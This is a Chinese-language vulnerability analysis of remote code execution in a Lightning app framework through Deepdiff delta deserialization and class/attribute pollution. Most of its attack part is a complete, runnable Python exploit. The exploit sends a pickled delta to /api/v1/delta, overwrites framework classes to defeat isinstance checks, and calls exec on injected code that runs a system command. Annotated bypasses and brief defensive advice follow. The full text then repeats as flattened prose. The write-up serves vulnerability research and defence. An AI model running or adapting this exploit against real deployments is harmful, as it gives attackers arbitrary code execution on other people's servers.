某系统因属性污染导致的RCE漏洞分析
字数 1305 2025-08-20 18:17:53

属性污染导致的RCE漏洞分析与利用

漏洞概述

本漏洞是通过反序列化操作污染类和属性,最终导致远程代码执行(RCE)的安全问题。该漏洞存在于一个使用Deepdiff进行反序列化的系统中,攻击者能够绕过反序列化限制,包括魔术方法和白名单机制,通过任意属性写入实现代码执行。

漏洞原理

核心机制

  1. 反序列化入口:系统通过/api/v1/delta接口接收JSON数据,其中的delta参数会被反序列化
  2. 属性污染:反序列化后的数据被用来动态修改类和对象的属性
  3. 路径解析:系统通过解析特殊格式的路径字符串来定位和修改目标属性

关键技术点

  • 通过namedtuple__globals__属性获取全局命名空间
  • 利用路径解析机制动态修改关键类和属性
  • 绕过多个isinstance类型检查
  • 最终通过__call__魔术方法执行任意代码

漏洞利用步骤

1. 构造恶意payload

import requests, time, pickle, pickletools
from collections import namedtuple
from ordered_set import OrderedSet

def send_delta(d):
    requests.post(server_host + '/api/v1/delta', headers={
        'x-lightning-type': '1',
        'x-lightning-session-uuid': '1',
        'x-lightning-session-id': '1'
    }, json={"delta": d})

# Monkey patch OrderedSet reduce to make it easier to pickle
OrderedSet.__reduce__ = lambda self, *args: (OrderedSet, ())

server_host = 'http://127.0.0.1:7501'
command = 'dir'

# 注入的恶意代码
injected_code = f"__import__('os').system('calc.exe')" + '''
import lightning, sys
from lightning.app.api.request_types import _DeltaRequest, _APIRequest
lightning.app.core.app._DeltaRequest = _DeltaRequest
from lightning.app.structures.dict import Dict
lightning.app.structures.Dict = Dict
from lightning.app.core.flow import LightningFlow
lightning.app.core.LightningFlow = LightningFlow
LightningFlow._INTERNAL_STATE_VARS = {"_paths", "_layout"}
lightning.app.utilities.commands.base._APIRequest = _APIRequest
del sys.modules['lightning.app.utilities.types']'''

bypass_isinstance = OrderedSet

delta = {
    'attribute_added': {
        "root['function']": namedtuple,
        # 绕过_collect_deltas_from_ui_and_work_queues中的isinstance(delta, _DeltaRequest)
        "root['function'].'__globals__'['_sys'].modules['lightning.app'].core.app._DeltaRequest": str,
        # 绕过_process_requests中的isinstance(request, _APIRequest)
        "root['bypass_isinstance']": bypass_isinstance,
        "root['bypass_isinstance'].'__instancecheck__'": str,
        "root['function'].'__globals__'['_sys'].modules['lightning.app'].utilities.commands.base._APIRequest": bypass_isinstance(),
        # 绕过get_component_by_name中的isinstance(current, LightningDict)
        "root['function'].'__globals__'['_sys'].modules['lightning.app'].structures.Dict": dict,
        # 绕过get_component_by_name中的if not isinstance(child, ComponentTuple):
        "root['function'].'__globals__'['_sys'].modules['lightning.app'].core.LightningFlow": bypass_isinstance(),
        "root['function'].'__globals__'['_sys'].modules['typing'].Union": list,
        # 防止前面程序报错将`provided_state["vars"]`覆盖为空
        "root['vars']": {},
        # 或者将`_INTERNAL_STATE_VARS`覆盖为空
        "root['function'].'__globals__'['_sys'].modules['lightning.app'].core.flow.LightningFlow._INTERNAL_STATE_VARS": (),
        # 设置最终执行的函数和参数
        "root['function'].'__globals__'['_sys'].modules['lightning.app'].api.request_types._DeltaRequest.name": "root.__init__.__builtins__.exec",
        "root['function'].'__globals__'['_sys'].modules['lightning.app'].api.request_types._DeltaRequest.method_name": "__call__",
        "root['function'].'__globals__'['_sys'].modules['lightning.app'].api.request_types._DeltaRequest.args": (injected_code,),
        "root['function'].'__globals__'['_sys'].modules['lightning.app'].api.request_types._DeltaRequest.kwargs": {},
        "root['function'].'__globals__'['_sys'].modules['lightning.app'].api.request_types._DeltaRequest.id": "root"
    }
}

payload = pickletools.optimize(pickle.dumps(delta, 1)).decode() \
    .replace('__builtin__', 'builtins') \
    .replace('unicode', 'str')

# 发送payload进行属性污染
send_delta(payload)

# 稍等确保payload被处理
time.sleep(0.2)
send_delta({})  # 触发代码执行

2. 关键绕过技术

(1) 绕过isinstance(delta, _DeltaRequest)检测

"root['function'].'__globals__'['_sys'].modules['lightning.app'].core.app._DeltaRequest": str

_DeltaRequest类覆盖为str类,使isinstance(delta, _DeltaRequest)返回False

(2) 绕过isinstance(request, _APIRequest)检测

bypass_isinstance = OrderedSet

"root['bypass_isinstance']": bypass_isinstance,
"root['bypass_isinstance'].'__instancecheck__'": str,
"root['function'].'__globals__'['_sys'].modules['lightning.app'].utilities.commands.base._APIRequest": bypass_isinstance(),

利用OrderedSet并设置__instancecheck__属性,使所有isinstance检查返回True

(3) 绕过isinstance(child, ComponentTuple)检测

"root['function'].'__globals__'['_sys'].modules['lightning.app'].core.LightningFlow": bypass_isinstance(),
"root['function'].'__globals__'['_sys'].modules['typing'].Union": list,

LightningFlow覆盖为OrderedSetUnion覆盖为list,绕过类型检查

(4) 绕过isinstance(current, LightningDict)检测

"root['function'].'__globals__'['_sys'].modules['lightning.app'].structures.Dict": dict,

LightningDict类覆盖为普通dict

3. 防止报错的两种方法

# 方法1: 将provided_state["vars"]覆盖为空
"root['vars']": {},

# 方法2: 将_INTERNAL_STATE_VARS覆盖为空
"root['function'].'__globals__'['_sys'].modules['lightning.app'].core.flow.LightningFlow._INTERNAL_STATE_VARS": (),

4. 最终代码执行

"root['function'].'__globals__'['_sys'].modules['lightning.app'].api.request_types._DeltaRequest.name": "root.__init__.__builtins__.exec",
"root['function'].'__globals__'['_sys'].modules['lightning.app'].api.request_types._DeltaRequest.method_name": "__call__",
"root['function'].'__globals__'['_sys'].modules['lightning.app'].api.request_types._DeltaRequest.args": (injected_code,),
"root['function'].'__globals__'['_sys'].modules['lightning.app'].api.request_types._DeltaRequest.kwargs": {},
"root['function'].'__globals__'['_sys'].modules['lightning.app'].api.request_types._DeltaRequest.id": "root"

通过__call__方法调用exec执行任意代码

技术细节分析

1. 路径解析机制

系统使用_path_to_elements函数解析路径字符串,例如:

"root['function'].'__globals__'['_sys'].modules['lightning.app'].api.request_types._DeltaRequest.test6"

会被解析为:

(('root', 'GETATTR'), ('function', 'GET'), ('__globals__', 'GETATTR'), ('_sys', 'GET'), ('modules', 'GETATTR'), ('lightning.app', 'GET'), ('api', 'GETATTR'), ('request_types', 'GETATTR'), ('_DeltaRequest', 'GETATTR'), ('test6', 'GETATTR'))

2. 属性设置机制

系统通过_set_new_value方法动态设置属性:

def _simple_set_elem_value(self, obj, path_for_err_reporting, elem=None, value=None, action=None):
    try:
        if action == GET:
            obj[elem] = value
        elif action == GETATTR:
            setattr(obj, elem, value)
    except (KeyError, IndexError, AttributeError, TypeError) as e:
        self._raise_or_log('Failed to set {} due to {}'.format(path_for_err_reporting, e))

3. 反序列化白名单绕过

虽然系统有反序列化白名单,但通过以下方式绕过:

  1. 使用白名单内的类(如namedtuple
  2. 通过__globals__获取全局命名空间
  3. 动态修改关键类和属性

防御建议

  1. 严格限制反序列化:避免反序列化不可信数据,或使用更安全的序列化格式
  2. 加强类型检查:不要仅依赖isinstance进行安全检查
  3. 限制属性访问:对动态属性访问进行严格控制
  4. 使用不可变类:关键类应设计为不可变,防止运行时修改
  5. 最小权限原则:运行服务的账户应具有最小必要权限

总结

该漏洞展示了如何通过精心构造的反序列化数据,利用系统的路径解析和属性设置机制,绕过多个安全检查,最终实现任意代码执行。攻击者通过污染关键类和属性,改变了系统的正常行为流程,展示了属性污染类漏洞的强大威力。

属性污染导致的RCE漏洞分析与利用 漏洞概述 本漏洞是通过反序列化操作污染类和属性,最终导致远程代码执行(RCE)的安全问题。该漏洞存在于一个使用 Deepdiff 进行反序列化的系统中,攻击者能够绕过反序列化限制,包括魔术方法和白名单机制,通过任意属性写入实现代码执行。 漏洞原理 核心机制 反序列化入口 :系统通过 /api/v1/delta 接口接收JSON数据,其中的 delta 参数会被反序列化 属性污染 :反序列化后的数据被用来动态修改类和对象的属性 路径解析 :系统通过解析特殊格式的路径字符串来定位和修改目标属性 关键技术点 通过 namedtuple 的 __globals__ 属性获取全局命名空间 利用路径解析机制动态修改关键类和属性 绕过多个 isinstance 类型检查 最终通过 __call__ 魔术方法执行任意代码 漏洞利用步骤 1. 构造恶意payload 2. 关键绕过技术 (1) 绕过 isinstance(delta, _DeltaRequest) 检测 将 _DeltaRequest 类覆盖为 str 类,使 isinstance(delta, _DeltaRequest) 返回 False (2) 绕过 isinstance(request, _APIRequest) 检测 利用 OrderedSet 并设置 __instancecheck__ 属性,使所有 isinstance 检查返回 True (3) 绕过 isinstance(child, ComponentTuple) 检测 将 LightningFlow 覆盖为 OrderedSet , Union 覆盖为 list ,绕过类型检查 (4) 绕过 isinstance(current, LightningDict) 检测 将 LightningDict 类覆盖为普通 dict 类 3. 防止报错的两种方法 4. 最终代码执行 通过 __call__ 方法调用 exec 执行任意代码 技术细节分析 1. 路径解析机制 系统使用 _path_to_elements 函数解析路径字符串,例如: 会被解析为: 2. 属性设置机制 系统通过 _set_new_value 方法动态设置属性: 3. 反序列化白名单绕过 虽然系统有反序列化白名单,但通过以下方式绕过: 使用白名单内的类(如 namedtuple ) 通过 __globals__ 获取全局命名空间 动态修改关键类和属性 防御建议 严格限制反序列化 :避免反序列化不可信数据,或使用更安全的序列化格式 加强类型检查 :不要仅依赖 isinstance 进行安全检查 限制属性访问 :对动态属性访问进行严格控制 使用不可变类 :关键类应设计为不可变,防止运行时修改 最小权限原则 :运行服务的账户应具有最小必要权限 总结 该漏洞展示了如何通过精心构造的反序列化数据,利用系统的路径解析和属性设置机制,绕过多个安全检查,最终实现任意代码执行。攻击者通过污染关键类和属性,改变了系统的正常行为流程,展示了属性污染类漏洞的强大威力。